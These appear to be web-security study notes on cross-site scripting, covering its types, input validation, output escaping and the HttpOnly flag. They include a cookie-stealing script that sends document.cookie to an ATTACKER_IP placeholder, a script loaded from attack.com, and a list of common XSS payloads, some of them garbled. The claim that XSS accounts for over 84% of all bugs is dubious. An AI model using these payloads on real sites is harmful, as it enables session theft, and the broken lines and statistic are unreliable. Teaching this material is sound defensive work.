โŒ
XSS
Cross-Site Scripting, or XSS is a web based vulnerability that enables injections of scripts into web pages by attackers in order to bypass access controls by attackers. It's one of the largest vulnerabilities seen on the web, accounting for more than 84% of all bugs; while also being the largest paying vulnerability, with more than $4 million dollars given in bounties in 2020 alone. These script injections can be written in any language that a browser can understand and execute (JavaScript, HTML).
  • HTML allows inclusion of executable scripts within documents using <script> tags
  • Websites use these scripts to make pages interactive and control app logic
1
<script> alert("Hi"); </script>
2
<script src="This-is-a-webpage-link"></script>
3
<script> location="http://www.moo.com";</script>
4
โ€‹
5
<!-- Using XSS to steal cookies in example below if HttpOnly flag not set -->
6
<script> image = new Image();
7
image.src='http://ATTACKER_IP/?c=' +document.cookie; </script>
Copied!
Inline scripts: Scripts embedded within an HTML file (not loaded from elsewhere)
Validating User Input: App checks that user input meets a standard (no malicious JS) Sanitizing input: App modifies chars in input that interfere with HTML logic before processing
Types of XSS:
  1. 1.
    Stored
  2. 2.
    Reflected
  3. 3.
    DOM-based
Stored XSS: When user input is stored on a server/retrieved unsafely. When an app accepts usr input w/out validation, stores it in servers, then renders it on user browsers without sanitization
  • Can make its way into the DB and victim browsers
  • Most severe XSS type
  • Attacks mean malicious scripts are stored on target app servers for others to access
Blind XSS: Stored XSS vulnerabilities whose malicious input is stored by the server and executed in another part of the app or in another app you can't see.
Reflected XSS: When usr input is returned to the user without being stored in a DB. The app takes in input, processes it server-side and returns it to the usr.
DOM-Based XSS: (Document Object Model) is a model browsers use to render web pages. DOM is the page's structure.
  • Similar to reflected XSS but user input never leaves the user's browser, then returns to the user
  • Targets a web page's DOM directly
Self XSS: Require victims to input a malicious payload themselves
  • Requires social engineering
  • Not counted towards bug bounties
Prevention: Implementing controls
  1. 1.
    Robust input validation
  2. 2.
    Contextual output escaping and encoding
Escaping: The practice of encoding special characters so that they are interpreted literally instead of as a special character by the programs/machines that process the characters.
  • Ensures browsers won't misinterpret characters as code to execute
1
<img onload=alert('image') src="example.png"
2
javascrip:alerct('hi')
3
<img src="IMAGE" />
4
โ€‹
5
// Common Payloads
6
<iframe src=javascript:alert(1)>
7
<body onload=alert(1)>
8
"><img src=x onerror=prompt(1);>
9
<script>alert(1)<!-
10
<a mouseover"alert(1)">test</a>
11
<script src=//attack.com/test.js>
Copied!
Measures to mitigate:
  • Can set HttpOnly flag on sensitive cookies that a site uses
    • Prevents attackers from stealing cookies via XSS
    • Lets restrictions for resources on JS, CSS, and images be handled on pages
Polyglot: A type of XSS payload that executes in multiple contexts
Copy link